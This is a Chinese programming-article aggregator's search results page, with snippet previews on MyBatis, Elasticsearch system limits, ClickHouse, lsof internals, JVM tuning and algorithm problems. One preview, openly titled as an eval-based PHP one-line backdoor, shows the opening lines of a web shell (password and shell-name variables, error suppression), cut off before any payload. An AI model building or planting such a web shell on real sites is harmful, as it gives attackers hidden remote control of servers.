码迷,mamicode.com
首页 >  
搜索关键字:系统调优 lsof nproc limit    ( 33688个结果
Spring BootMyBatis代码生成
一、简介 1.1 MyBatis Generator介绍 MyBatis Generator 是MyBatis 官方出品的一款,用来自动生成MyBatis的 mapper、dao、entity 的框架,让我们省去规律性最强的一部分最基础的代码编写。 1.2 MyBatis Generator使用 M ...
分类:编程语言   时间:2020-05-18 22:23:23    阅读次数:53
同一台机器配置两个elasticsearch7.6.2实例
使用软件版本:elasticsearch7.6.2 配置运行环境更改系统参数: vim /etc/security/limits.conf * soft nofile 65537 * hard nofile 65537 * soft nproc 65537 * hard nproc 65537 vi ...
分类:其他好文   时间:2020-05-17 17:51:52    阅读次数:165
ClickHouse奇技淫巧系列之SQL查文件
history | awk '{print $1"\t"$2}' | clickhouse-client \ --query="SELECT shell, count() AS c FROM history \ GROUP BY shell ORDER BY c DESC limit 10 " \ ...
分类:数据库   时间:2020-05-16 20:49:03    阅读次数:92
解决dede的loop中无法使用limit的方案+文章前数字序号
例如我要调用织梦dedecms网站“积分或金钱”排名前14的会员: {dede:loop table=’dede_member’ sort=’money’ num=’0′ if=”} <li> <span class="ytop">[field:autoindex runphp='yes']$aaa ...
分类:其他好文   时间:2020-05-16 17:05:55    阅读次数:77
Structure of a C program: Pre-processor directives (#include <stdlib.h>, #define)
Preprocessor programs provide preprocessors directives which tell the compiler to preprocess the source code before compiling. Examples of some prepro ...
分类:其他好文   时间:2020-05-16 00:28:44    阅读次数:64
关于工具使用的一次问答记录
Q:今天有人问我lsof是怎么实现的? 然后当时在想要是我应该怎么实现? 通过每个进程的file_table list 出来!!! 实际上怎么出来的呢??strace lsof 结果可知 就是通过读取 /proc/pid/fdinfo 。。。。。。。。。。。。。。平时会用到proc/pid/ 却没有 ...
分类:其他好文   时间:2020-05-16 00:22:10    阅读次数:75
evalPHP一句话后门
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:Web程序   时间:2020-05-15 13:23:16    阅读次数:242
JVM性能调优
JVM技术图谱 性能调优 性能调优包含多个层次,比如:架构调优、代码调优、JVM调优、数据库调优、操作系统调优等。 架构调优和代码调优是JVM调优的基础,其中架构调优是对系统影响最大的。 性能调优基本上按照以下步骤进行:明确优化目标、发现性能瓶颈、性能调优、通过监控及数据统计工具获得数据、确认是否达 ...
分类:其他好文   时间:2020-05-13 17:20:33    阅读次数:67
hdu 4960(预处理+DP)
Another OCD Patient Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 131072/131072 K (Java/Others)Total Submission(s): 2259 Accepted Submission(s) ...
分类:其他好文   时间:2020-05-12 18:40:48    阅读次数:56
hdu 4958(博弈论+概率DP)
Poor Rukaw Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others)Total Submission(s): 223 Accepted Submission(s): 102 Proble ...
分类:其他好文   时间:2020-05-12 17:08:05    阅读次数:54
33688条   上一页 1 ... 36 37 38 39 40 ... 3369 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!